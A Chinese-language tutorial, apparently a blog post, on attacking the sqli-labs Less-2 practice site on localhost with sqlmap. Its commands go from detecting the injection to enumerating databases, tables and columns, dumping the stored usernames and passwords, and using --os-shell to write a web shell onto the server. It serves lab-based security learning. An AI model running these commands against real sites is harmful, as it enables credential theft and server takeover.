环境

  • phpstudy
  • sqli-labs

本次注入中我们使用sqli-labs的less-2作为测试网站

使用sqlmap进行MySQL数据库的注入

检测是否存在注入

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1

使用sqlmap进行MySQL数据库的注入,sqlmap工具使用,sqlmap的参数详解_MySQL数据库

显示payload详细信息

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 -v 3

使用sqlmap进行MySQL数据库的注入,sqlmap工具使用,sqlmap的参数详解_sqlmap_02

当前数据库用户是否是高权限用户

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 --is-dba

使用sqlmap进行MySQL数据库的注入,sqlmap工具使用,sqlmap的参数详解_sqlmap_03

查看当前用户的权限

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 --privileges

使用sqlmap进行MySQL数据库的注入,sqlmap工具使用,sqlmap的参数详解_MySQL数据库_04

爆数据库

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 --dbs

使用sqlmap进行MySQL数据库的注入,sqlmap工具使用,sqlmap的参数详解_sqlmap_05

爆当前数据库

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 --current-db

使用sqlmap进行MySQL数据库的注入,sqlmap工具使用,sqlmap的参数详解_sqlmap_06

爆所有数据库的所有表(比较慢,因为所有数据库中的表太多了)

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 --tables

使用sqlmap进行MySQL数据库的注入,sqlmap工具使用,sqlmap的参数详解_sqlmap_07

爆指定数据库的所有表

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 -tables -D security

使用sqlmap进行MySQL数据库的注入,sqlmap工具使用,sqlmap的参数详解_sqlmap_08

爆指定表的所有列

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 -columns -T users -D security

使用sqlmap进行MySQL数据库的注入,sqlmap工具使用,sqlmap的参数详解_MySQL数据库_09

爆指定列的指定字段

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 -dump -C id,username,password -T users -D security

使用sqlmap进行MySQL数据库的注入,sqlmap工具使用,sqlmap的参数详解_sqlmap_10

sqlmap写入shell

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 --os-shell

这里我们是php的环境,我们选择4

使用sqlmap进行MySQL数据库的注入,sqlmap工具使用,sqlmap的参数详解_MySQL数据库_11

这里我们选择2,自定义路径

使用sqlmap进行MySQL数据库的注入,sqlmap工具使用,sqlmap的参数详解_sqlmap_12

选择接受标准输出

使用sqlmap进行MySQL数据库的注入,sqlmap工具使用,sqlmap的参数详解_MySQL数据库_13

我们的文件夹中出现了写入的shell

使用sqlmap进行MySQL数据库的注入,sqlmap工具使用,sqlmap的参数详解_MySQL数据库_14